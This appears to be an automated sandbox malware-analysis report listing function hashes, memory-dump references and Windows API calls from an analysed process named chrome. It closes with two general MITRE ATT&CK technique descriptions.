Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: bitset set argument out of range$bitset test argument out of range
API String ID: 17069307-1976194836
Opcode ID: e7f49c46d4a3a9ee38ae16bad91eb18d31e28c1e0615a3d34aad16d1fd0c2494
Instruction ID: 20aefc37164b58826121006c9b8c4aee438bf6d2b5a4636f9f7e021c5086b581
Opcode Fuzzy Hash: e7f49c46d4a3a9ee38ae16bad91eb18d31e28c1e0615a3d34aad16d1fd0c2494
Instruction Fuzzy Hash: D0112755F0C64A42FE049B11FA483BA2613AFB07D0F405138EE4E87785DD6CF48EA724

Function 00007FF63EDF4150 Relevance: 6.3, APIs: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF63EDF419F
SetLastError.KERNEL32 ref: 00007FF63EDF41B4
GetLastError.KERNEL32 ref: 00007FF63EDF41D4
SetLastError.KERNEL32 ref: 00007FF63EDF41E6
GetLastError.KERNEL32 ref: 00007FF63EDF4218

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 79a07a6fcbdbd1bffff7d87952e3264a3ed99b75aa4ba779420d016a46218e4b
Instruction ID: 899087957ce118926f597e93b5cebc64cc1d26ee74dda76b0d68b01b8150a7e9
Opcode Fuzzy Hash: 79a07a6fcbdbd1bffff7d87952e3264a3ed99b75aa4ba779420d016a46218e4b
Instruction Fuzzy Hash: 1A21A735A0C54285FA509BA4AC5437A26D45FB8760F4C0334FA6E833D0DE7CE44EA220

Function 00007FF63EE61D20 Relevance: 6.2, APIs: 4, Instructions: 165COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32(?,00000001,000000C0,00007FF63EE61C81), ref: 00007FF63EE61D5A
AcquireSRWLockExclusive.KERNEL32(?,00000001,000000C0,00007FF63EE61C81), ref: 00007FF63EE61E48
TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EF1587D

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: AcquireExclusiveLock
String ID:
API String ID: 4021432409-0
Opcode ID: 44c5e20faccbea71cacc84ea3090f7a4a129abb64d4d634bef74db1b70222435
Instruction ID: 7f994acc5f8a710878079da6f22f57105a7ac4ac263c5f9f098c3c1e4367608a
Opcode Fuzzy Hash: 44c5e20faccbea71cacc84ea3090f7a4a129abb64d4d634bef74db1b70222435
Instruction Fuzzy Hash: 2751D026B09A16C1EF118F56E4401792760FFA8F95F444036EE4E87394DF7DD48AD760

Function 00007FF63EF00794 Relevance: 6.1, APIs: 4, Instructions: 54COMMON

Download Yara Rule

APIs

FlsSetValue.KERNEL32 ref: 00007FF63EF007D2
FlsSetValue.KERNEL32 ref: 00007FF63EF007FA
FlsSetValue.KERNEL32 ref: 00007FF63EF0080B
FlsSetValue.KERNEL32 ref: 00007FF63EF0081C

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: d9166da6a4fedb4f979672270f69ebf9606409cc7cc3436a887b56e6aeab09e1
Instruction ID: e67e282f4abf45e70dda7a1c53a0b1d8bf61599293e4473a0191687186a58374
Opcode Fuzzy Hash: d9166da6a4fedb4f979672270f69ebf9606409cc7cc3436a887b56e6aeab09e1
Instruction Fuzzy Hash: 25116310E0974242FB54A321694123A5281AFA47A0F445B3CF92EC77D6DEECB909A2A0

Function 00007FF63EEDD7F4 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF63EEDD820
GetCurrentThreadId.KERNEL32 ref: 00007FF63EEDD82E
GetCurrentProcessId.KERNEL32 ref: 00007FF63EEDD83A
QueryPerformanceCounter.KERNEL32 ref: 00007FF63EEDD84A

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 2933794660-0
Opcode ID: 04eb7a2f1a86125a6dbfe8aa62805a9f78b8155da99574f3ce56fa004fffc36f
Instruction ID: b17bee1357aa6612f50fc787b84d50b14240cc07534be2f60cbdeb8405cc3646
Opcode Fuzzy Hash: 04eb7a2f1a86125a6dbfe8aa62805a9f78b8155da99574f3ce56fa004fffc36f
Instruction Fuzzy Hash: 6F118626B14F018AEB00DF60E8442B933A4FB69758F441E35EA5D87768DFBCE1689350

Function 00007FF63EE628B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EE62907
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00007FF63EDBE6DF), ref: 00007FF63EE62A2B

Strings

first, xrefs: 00007FF63EE62AAD

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease
String ID: first
API String ID: 17069307-2456940119
Opcode ID: 0f009a60e3caf48889c9ccb12b30ec7e4e58b77c967d3d9f2c4824d2d9f5b28f
Instruction ID: ef891685d3d76d2eac05d510240a7cf4d0ea1e45cf228ec6b287cf20a97ae8c2
Opcode Fuzzy Hash: 0f009a60e3caf48889c9ccb12b30ec7e4e58b77c967d3d9f2c4824d2d9f5b28f
Instruction Fuzzy Hash: B0511472A08B4681EB14CF16E5542B977A0FBA9B88F544035EF4D47794DF7DD086D320

Function 00007FF63EDF4430 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNEL32 ref: 00007FF63EDF44CB
ReadProcessMemory.KERNEL32 ref: 00007FF63EDF44FE

Strings

(, xrefs: 00007FF63EDF44D5

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: MemoryProcessRead
String ID: (
API String ID: 1726664587-3887548279
Opcode ID: bcb83668c932add7e2c81a7d5cd414376a42f31553cd7dd17d44c14c71bd3585
Instruction ID: 44efef216e98dc8275fce7886d28564087400300f6f5dcbbb987fed483ee2e7f
Opcode Fuzzy Hash: bcb83668c932add7e2c81a7d5cd414376a42f31553cd7dd17d44c14c71bd3585
Instruction Fuzzy Hash: 8731C132608B8181EB309F66B4013EBA7A4FF99B95F455221EE8C83B54DF3CD64AC700

Function 00007FF63EDB1870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 74COMMON

Download Yara Rule

APIs

TryAcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EDB1891
AcquireSRWLockExclusive.KERNEL32 ref: 00007FF63EDB1944

Strings

..\..\third_party\libc++\src\include\array:234: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>, xrefs: 00007FF63EDB1935

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: AcquireExclusiveLock
String ID: ..\..\third_party\libc++\src\include\array:234: assertion __n < _Size failed: out-of-bounds access in std::array<T, N>
API String ID: 4021432409-2696940747
Opcode ID: 3f0b879406dd71d9b7e4677304ff48be8ddae573981dce2af592c241fdab1611
Instruction ID: f8aa12d63083298fd1bf8085f48ab5ba751517d93e3d686ed602e85b478c1de5
Opcode Fuzzy Hash: 3f0b879406dd71d9b7e4677304ff48be8ddae573981dce2af592c241fdab1611
Instruction Fuzzy Hash: FE212711F0E2D7A0FE258B62450467D1BA0FF74B88F144236EE1F87791AE6CA55EA320

Function 00007FF63EEDD97C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32(00007FF63EEDCB47,?,?,?,?,00007FF63EEDAA6B), ref: 00007FF63EEDD9CC
RaiseException.KERNEL32(00007FF63EEDCB47,?,?,?,?,00007FF63EEDAA6B), ref: 00007FF63EEDDA0D

Strings

csm, xrefs: 00007FF63EEDD9FA

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 0f7bd9916902249b5c99215e7065480f8df65aacb9190a0386ba75daa210fbc3
Instruction ID: a12419b4fdd48fc1881b8c207b4843b6e64852b576a0e482fee10c17dff57c14
Opcode Fuzzy Hash: 0f7bd9916902249b5c99215e7065480f8df65aacb9190a0386ba75daa210fbc3
Instruction Fuzzy Hash: 78115B36619B41C2EB218B15E44026A77E5FF98B88F588234EB8C47758DFBDD5558B00

Function 00007FF63EECC830 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF63EECC87F
GetProcAddress.KERNEL32 ref: 00007FF63EECC88F

Strings

GetHandleVerifier, xrefs: 00007FF63EECC885

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetHandleVerifier
API String ID: 1646373207-1090674830
Opcode ID: 5c2c7fc1bdf67f5e69b6ee413479e1a6b8f8a05e8ceac201aac2c200ed1d9da2
Instruction ID: 7ad2c1154f385dfe5a6a5419ea47f60f0831e4c2008c88cc2935614fd5fe2de7
Opcode Fuzzy Hash: 5c2c7fc1bdf67f5e69b6ee413479e1a6b8f8a05e8ceac201aac2c200ed1d9da2
Instruction Fuzzy Hash: 80011B26F0DA1681FB249B25A85437A1751AF64F80F55443AE90EC33A4DEBDB04DF320

Function 00007FF63EDBFCB0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,?,00007FF63EE594C3,?,?,?,00000000,00007FF63EDB1EA3), ref: 00007FF63EDBFD02
GetProcAddress.KERNEL32(?,?,?,?,00007FF63EE594C3,?,?,?,00000000,00007FF63EDB1EA3), ref: 00007FF63EDBFD12

Strings

GetHandleVerifier, xrefs: 00007FF63EDBFD08

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetHandleVerifier
API String ID: 1646373207-1090674830
Opcode ID: d1f4715f804becae9059b92a00ee1cb28af3340a212d3e92cb0725ac72e9c449
Instruction ID: caa0ce5d96647bbe59b51091d4b0337d87d90daced99ae2ff4ca448cfc9e3ef2
Opcode Fuzzy Hash: d1f4715f804becae9059b92a00ee1cb28af3340a212d3e92cb0725ac72e9c449
Instruction Fuzzy Hash: 5D116124E0DA0781EB189765E9943791351EF64B80F44563AE90ED73A4EE7DF48EF220

Function 00007FF63EDE76A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF63EDE76EF
GetProcAddress.KERNEL32 ref: 00007FF63EDE76FF

Strings

GetHandleVerifier, xrefs: 00007FF63EDE76F5

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetHandleVerifier
API String ID: 1646373207-1090674830
Opcode ID: 5a0bf3edfb930e611b529724e56632e9bc9272be2979e83de85f8da9e4100777
Instruction ID: cde05b649dbd41cc8615b9f75430a602511cc2719ca5fb803c5f9aec8aa5a273
Opcode Fuzzy Hash: 5a0bf3edfb930e611b529724e56632e9bc9272be2979e83de85f8da9e4100777
Instruction Fuzzy Hash: 79012D25F0DA0781EB94AB25A4583395361AFA4BC4F545539E90EC33A4DEBDB44DF320

Function 00007FF63EF196B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 37COMMON

Download Yara Rule

APIs

__std_exception_destroy.LIBVCRUNTIME ref: 00007FF63EF196F9

Strings

Bad variant access, xrefs: 00007FF63EF196BB
bad_variant_access.cc, xrefs: 00007FF63EF196B4

Memory Dump Source

Source File: 00000009.00000002.2301419267.00007FF63EDB1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF63EDB0000, based on PE: true

Associated: 00000009.00000002.2301359970.00007FF63EDB0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301567835.00007FF63EF9F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301625864.00007FF63EFE1000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFE2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301645128.00007FF63EFEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301692165.00007FF63EFF0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301728968.00007FF63EFFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301762596.00007FF63F00F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301790033.00007FF63F010000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000009.00000002.2301815948.00007FF63F011000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff63edb0000_chrome.jbxd

Similarity

API ID: __std_exception_destroy
String ID: Bad variant access$bad_variant_access.cc
API String ID: 2453523683-4004146108
Opcode ID: 7346b80b12a5e2d697a81cb705a21295759d987beacbef3e8922195e1ff3f804
Instruction ID: 7bf0434d904df59204d80943e00e704c76306dce1751bd2cf362fa8dcc4a9950
Opcode Fuzzy Hash: 7346b80b12a5e2d697a81cb705a21295759d987beacbef3e8922195e1ff3f804
Instruction Fuzzy Hash: 09E06125F0991780FB097F69A4501F421118FD4B90F444534FD0C47750FDAD964F9720

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Drive: Drive Creation, File: File Access, File: File Creation, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
